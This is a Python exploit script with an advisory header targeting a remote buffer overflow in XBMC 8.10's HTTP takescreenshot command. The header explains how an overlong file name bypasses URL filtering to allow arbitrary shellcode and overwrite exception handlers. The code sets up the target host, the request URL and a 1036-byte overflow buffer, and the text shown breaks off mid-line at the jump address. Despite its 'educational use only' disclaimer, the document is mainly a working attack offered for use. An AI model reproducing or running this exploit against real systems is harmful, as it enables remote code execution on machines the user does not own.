#!/usr/bin/env python ''' Xbmc takescreenshot request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows < tested other versions are also possibly affected. Restrictions:No restrictions This exploit happens when parsing and overly long file name to the server using the takescreenshot command. there is a description in the poc code. When passing this to the http server we can evade url: filtering as it is passed to the application as an overly long dir. This means we can use any shell code we wish. We are able to overwrite the exception handlers also so creating a reliable exploit for vista and xps3 shouldn't be to hard have a look there are some modules loaded with out /safe seh. Credits to n00b for finding the buffer overflow and writing poc code and exploit. ---------- Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!! ''' import sys, socket import struct port = 80 host = sys.argv[1] Start_url ='xbmcCmds/xbmcHttp?command=takescreenshot(' Junk_buffer = 'A'*1036 Jump_esp = struct.pack('